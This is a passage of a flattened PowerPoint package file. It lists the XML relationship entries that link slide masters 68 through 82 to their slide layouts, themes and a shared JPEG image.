Target="../slideLayouts/slideLayout663.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout662.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme67.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout670.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout661.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster68.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout679.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout678.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout677.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout676.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout675.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout674.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout673.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout672.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme68.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout680.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout671.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster69.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout689.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout688.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout687.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout686.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout685.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout684.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout683.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout682.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme69.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout690.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout68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69.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout68.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout67.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout63.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout62.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme7.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout70.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout61.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster70.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout699.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout698.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout697.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout696.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout695.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout694.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout693.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout692.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme70.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout700.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout691.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster71.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout709.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout708.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout707.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout706.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout705.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout704.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout703.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout702.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme71.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout710.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout701.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster72.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout719.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout718.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout717.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout716.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout715.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout714.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout713.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout712.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme72.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout720.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout711.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster73.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout729.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout728.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout727.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout726.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout725.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout724.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout723.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout722.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme73.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout730.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout721.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster74.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout739.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout738.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout737.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout736.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout735.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout734.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout733.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout732.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme74.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout740.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout731.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster75.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout749.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout748.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout747.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout746.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout745.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout744.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout743.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout742.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme75.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout750.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout741.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster76.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout759.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout758.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout757.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout756.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout755.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout754.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout753.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout752.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme76.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout760.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout751.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster77.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout769.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout768.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout767.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout766.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout765.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout764.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout763.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout762.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme77.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout770.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout761.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster78.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout779.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout778.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout777.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout776.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout775.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout774.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout773.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout772.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme78.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout780.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout771.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster79.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout789.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout788.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout787.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout786.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout785.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout784.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout783.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout782.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme79.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout790.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout78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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme8.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><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80.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout799.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout798.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout797.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout796.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout795.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout794.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout793.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout792.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme80.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout800.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout791.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster81.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout809.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout808.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout807.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout806.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout805.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout804.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout803.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout802.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme81.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout810.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout801.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster82.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout819.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout818.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout817.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout816.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout815.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout814.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout813.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout812.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme82.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout820.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" 